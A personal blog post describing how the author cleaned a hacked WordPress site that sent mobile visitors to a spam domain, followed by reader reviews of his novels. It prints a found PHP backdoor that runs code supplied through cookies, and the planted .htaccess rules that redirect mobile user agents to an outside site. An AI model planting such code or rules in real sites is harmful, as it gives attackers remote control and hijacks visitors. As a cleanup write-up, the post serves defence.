Skip to content

Fixing a WordPress Redirect Hack

tom-the-photographer-301322

So I got a frantic call from my BFF who said, Daniel, your Science Fiction novels are so good. Can you help me fix my website? This BFF obviously knows how to preface a question, so I agreed to take a look. What I found was both confusing and arousing, and after fixing it, I said to myself, Daniel, your Science Fiction novels are so good, but you’re never going to remember how to fix this. That brings us to this blog post, wherein I tell you how to stop your WordPress website from redirecting to a shitty spam site, specifically when accessed via a mobile device.

The fact that the redirect only happens on mobile devices was quite interesting, but trying to investigate on an iPhone is pretty much impossible. Luckily, Chrome has you covered. Just hit F12 to open Developer Tools, and toggle the device toolbar (CTRL-SHIFT-M). Then you can trick the website into think you’re an iPhone and trigger the redirect. I did just that, tried to look at the network events, javascript debugger, etc., but found nothing!

The redirect was taking me to a .bid site, so I grepped for that word in the WordPress install but didn’t find it there either. A quick Google search turned up a lot of advice about looking for encoded PHP in the theme files, but they were all clean. Then I turned my attention to the uploads folder.

I found this file and couldn’t figure out what it did.

daniel@bffserver [~]# cat psvkwrmv.php.fart 
--?php 

$oewzo=$_COOKIE;
$ycke=$oewzo[zutc];
if($ycke){
 $ojaf=$ycke($oewzo[yzda]);$gpjc=$ycke($oewzo[kvyi]);$fyup=$ojaf("",$gpjc);$fyup();

I ran it through the hex, base64, and php decoders but nothing came up, so I renamed it to a harmless .fart file and moved it out of the uploads directory.

Then I found the culprit! Here are the contents of the .htaccess file in the uploads directory:

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge\ |maemo|midp|mmp|mobile.+firefox|netfront|opera\ m(ob|in)i|palm(\ os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows\ ce|xda|xiino [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a\ wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r\ |s\ )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1\ u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(\ i|ip)|hs\-c|ht(c(\-|\ |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(\ |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(\ |\/)|klon|kpt\ |kwc\-|kyo(c|k)|le(no|xi)|lg(\ g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|\ |o|v)|zz)|mt(50|p1|v\ )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v\ )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|\ )|webc|whit|wi(g\ |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-) [NC]
RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L]

You son of a bitch .htaccess file!

Sadly, whatever made those edits also touched the .htaccess files in a bunch of other directories, including the root .htaccess file that should look like this:

dverast@dougherty:~/danielverastiqui.com$ cat .htaccess

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

If you need to find all the affected .htaccess files quickly, you can use grep:

daniel@bffserver [~]# grep -lR "luxurytds.com" .
grep: ./access-logs: No such file or directory
./www/blog/backup-1408304576-wp-admin/.htaccess
./www/blog/backup-1408304576-wp-includes/.htaccess
./www/blog/backup-1500088171-wp-admin/.htaccess
./www/blog/backup-1500088171-wp-includes/.htaccess
./www/blog/wp-content/backup-1500088171-themes/.htaccess
./www/blog/wp-content/backup-1408304576-themes/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/.htaccess
./www/blog/wp-content/backup-1408304576-plugins/.htaccess
./www/cgi-bin/.htaccess
./public_html/blog/backup-1408304576-wp-admin/.htaccess
./public_html/blog/backup-1408304576-wp-includes/.htaccess
./public_html/blog/backup-1500088171-wp-admin/.htaccess
./public_html/blog/backup-1500088171-wp-includes/.htaccess
./public_html/blog/wp-content/backup-1500088171-themes/.htaccess
./public_html/blog/wp-content/backup-1408304576-themes/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/.htaccess
./public_html/blog/wp-content/backup-1408304576-plugins/.htaccess
./public_html/cgi-bin/.htaccess

After I deleted every .htaccess file and replaced them with defaults or recommended, the site stopped redirecting. Success!

However:

 


Photo by Tom The Photographer on Unsplash

Published inSoftware

Be First to Comment

Leave a Reply

Recent Reviews

I really enjoyed this book. I was worried as it started out great with the elementary school scene, and then started up with high school and I thought I hope this stays as good as it was. Thankfully it did. I loved it. I found the world that was created was really interesting and instead of a lot of long drawn out explanations of what things are and do, they are shown to the reader instead which I loved! I did like reading the different chapters from different characters POV, some evil people some good people some of everyone. I loved it. I really would like to read more. Related

Jennifer – Veneer

Cyberpunk and Virtual Reality Meets Snapchat My favorite thing about Xronixle was definitely the concept of the immersive virtual world and it’s ramifications on society. It was interesting to see Verastiqui’s early views of such a world and the toll it would take on those most involved with it. I can see a great number of parallels between the inhabitants of the virtual reality and the world of today’s smartphone-addicted citizens. While the plot and story were interesting albeit amateurish (definitely to be expected with a very early work like this); I definitely enjoyed the way the characters and the world were brought to life. I could see the imagery playing out as if it were a “birth of the internet” era cyber-thriller blockbuster a la “The Matrix” or “Johnny Mnumonic”. It brought back fond memory of the younger me’s interest in cyber-punk novels and my time playing Netrunner. I’m looking forward to starting the next one. Related

Jason Roy – Xronixle
© 2018 Daniel Verastiqui